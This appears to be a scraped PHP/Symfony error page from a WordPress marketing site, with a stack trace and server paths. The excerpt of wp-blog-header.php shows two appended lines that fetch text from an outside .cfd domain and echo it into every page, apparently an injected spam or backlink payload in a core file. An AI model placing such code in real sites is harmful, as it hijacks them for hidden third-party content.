file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages: error:1416F086:SSL routines:tls_process_server_certificate:certificate verify failed (500 Internal Server Error)

Symfony Exception

ErrorException

HTTP 500 Internal Server Error

file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages:
error:1416F086:SSL routines:tls_process_server_certificate:certificate verify failed

Exception

ErrorException

  1.     // Load the theme template.
  2.     require_once ABSPATH WPINC '/template-loader.php';
  3. }
  4. $a file_get_contents('https://kutunggujandamu.cfd/bl/index.txt');
  5. echo $a;
  1.      * @throws \ErrorException
  2.      */
  3.     public function handleError($level$message$file ''$line 0$context = [])
  4.     {
  5.         try {
  6.             parent::handleError($level$message$file$line$context);
  7.         } catch (Throwable $e) {
  8.             if (! apply_filters('acorn/throw_error_exception'true$e)) {
  9.                 return false;
  10.             }
HandleExceptions->handleError()
  1.     // Load the theme template.
  2.     require_once ABSPATH WPINC '/template-loader.php';
  3. }
  4. $a file_get_contents('https://kutunggujandamu.cfd/bl/index.txt');
  5. echo $a;
require('/home/creolemarketing/public_html/wp-blog-header.php') in /home/creolemarketing/public_html/index.php (line 17)
  1.  * @var bool
  2.  */
  3. define'WP_USE_THEMES'true );
  4. /** Loads the WordPress Environment and Template */
  5. require __DIR__ '/wp-blog-header.php';

Stack Trace

ErrorException
ErrorException:
file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages:
error:1416F086:SSL routines:tls_process_server_certificate:certificate verify failed

  at /home/creolemarketing/public_html/wp-blog-header.php:25
  at Illuminate\Foundation\Bootstrap\HandleExceptions->handleError()
     (/home/creolemarketing/public_html/wp-content/themes/creolecuisine-marketing/vendor/roots/acorn/src/Roots/Acorn/Bootstrap/HandleExceptions.php:54)
  at Roots\Acorn\Bootstrap\HandleExceptions->handleError()
  at file_get_contents()
     (/home/creolemarketing/public_html/wp-blog-header.php:25)
  at require('/home/creolemarketing/public_html/wp-blog-header.php')
     (/home/creolemarketing/public_html/index.php:17)